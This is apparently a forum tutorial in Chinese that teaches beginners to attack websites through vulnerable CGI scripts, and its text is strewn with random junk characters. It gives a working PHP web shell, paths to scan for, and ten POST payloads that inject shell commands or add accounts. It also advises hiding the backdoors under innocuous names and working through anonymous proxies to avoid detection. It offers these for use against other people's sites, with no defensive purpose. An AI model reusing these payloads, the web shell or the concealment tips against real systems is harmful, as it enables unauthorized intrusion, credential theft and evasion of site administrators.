CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
; j# k- D- K0 H  T3 A: z( j0 X我会长长来玩的
前言:
7 |( W. {5 ]1 U$ ]5 t以下讲解针对欧美日本网站
& u5 G. f' k/ z$ c* ~當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/
# I" x! E0 h: ~2 n3 Q$ y; |
只是个人在实务上一些经验
, N7 E9 [7 S1 z' |, s4 k5 D: D+ j写的不好 请多多见谅喔
1 U5 e# ^+ }3 R! H! L1 g1 L3 X在这里我简单分为几个部份一定要會的
4 b* @% I  R$ _* W# x9 b讲解一下
让没有基础的人很容易上手
" X8 o- G, u$ P" {  M, E2 p
/ Y* F1 i6 K4 G. k- f- t以下内容跟帖回复才能看到
==============================
( m& X7 v2 O- Y! Q8 E$ P2 d8 a/ ^8 G
- ]  f9 o' m0 X第1部份: 何谓Shell?
Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
# u, n! [+ l2 h  b, c
  ^6 ]0 c0 f" D对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

第2部份: Unix 指令
+ j: O4 q) o/ {, P; j* i- Q# y: N: F以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
: q9 o/ [# j( w  o. Z9 B4 `ls -al :详细列出档案资料(当前目录)
& `/ }5 J, R, |$ ]* h7 gls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
( W5 X9 A* x4 |8 l! }: acat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
7 ^5 O. y. q: O4 H3 z$ Nman: 显示指令用法  
# C4 x- b# x$ p8 rman ls: 显示ls这指令的用法  
mkdir 建立目录
rmdir 删除目录
8 @) J) v7 o1 A9 B/ vmv 移动档案
% }# P8 g" C6 hrm 删除档案

- s" f$ \3 @# P# D, C第3部份: Shell的使用
# L8 Y% Y* V2 ]" N1 t' Q0 a4 t% Z" w例如:
+ `4 i1 R5 `  R4 f1 `; {# t& {1 Fhttp://site.com/refer.php
/ ]7 G" `. m  c# V这是我的後门, 原代码如下:
% l; e  i; G: q9 R<Form Action="#" Method="POST">
<Input type="text" name="cmd">
" H* I+ ]" R) h5 z$ U' s<Input type="Submit">
</Form>
4 M. y( q9 p' S" E) F<?php
# P1 p2 o9 S2 _: S) I2 S! E$cmd = $_POST['cmd'];
7 {0 D8 X) b. [# X2 P$Output = shell_exec($cmd);
; W6 {3 W$ @; A5 i$ fecho $Output;
' D6 Q7 `- Z- C: M5 z5 u4 ^3 q6 D?>
输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

第4部份: 注意事项
3 S/ r) x/ b8 ^! c4 N* W- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
4 x$ j; @; n3 z" B0 P5 d- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
5 b5 v& I- _" K% O. m不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
8 ]& K' M% R: c8 b开始讲解脚本入侵过程:
  h0 u/ V( m! N在这里提供一些方法思路让大家学习一下
5 q2 w& C+ P  T+ u) b8 S
1.一开始对一个网站进行cgi漏洞扫描
' d* c" `, n# {$ E! o我们需要的东西有
, N6 M2 Z. K. z  x- J扫洞工具 如:triton..等等
0 u; L3 C* Q$ \2 e% z6 e. k  IE表
如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
. ^" {9 v+ b7 ^/Admin_files/order.log
8 D* {. |7 ?/ ~3 N; B; y! _0 J# c# C/orders/mountain.cfg
* w( \1 }6 N; ^+ ~+ W/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day
5 S& b: N; y( Z( T5 F4 W& X
2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
! d) A; E* N0 d! F% `6 ?: V没有返回一定是假的
3.重来来了 很多人都会问我
6 {% {' n2 ]5 [5 s0 b他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
% R! f/ f* `+ b/ X9 x  k/ a, i我们要找post 的方法很多
可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等
3 f( {. p' ]* |" O2 f
) u( S/ _9 i! g7 t/ I/ _" P以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
/ L: L: Q# _6 H5 m/index.cgi
wei=ren&gen=command
/passmaster.cgi
1 ^. Z5 ?4 |7 Y$ n) _Action=Add&Username=Username&Password=Password
+ |8 d. h  V$ ]5 u! G/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
0 _* N. d/ i4 j* m6 _% b8 b% r/addusr.pl
/ r5 |/ \/ O1 D6 G0 |( o$ a2 m2 j/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
" Q/ [. p* u( k0 L/ lpost_values=username:password
) S5 `) c! y. L/ w5 g/count.cgi
* n/ Z4 U8 z) e0 |. Q% ]& K& R' i: |pinfile=|echo;ls -la;exit|
/recon.cgi
" {/ p# h" A! p: ^& y/recon.cgi?search
  K) q6 D1 m; Q6 W) W$ Jsearchoption=1&searchfor=|echo;ls -al;exit|
5 N7 H! a- q# F, k/ i, I# [% {/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
: U9 F; ^2 T- ~6 o/ w7 ^6 |/ g/af.cgi_browser_out=|echo;ls -la;exit;|
$ c% C, d+ r' f  N4 z1 A
& Z& b, |$ p) I3 h. c2 l今天就讲到这  感谢大家支持
  |1 o8 L- Z8 N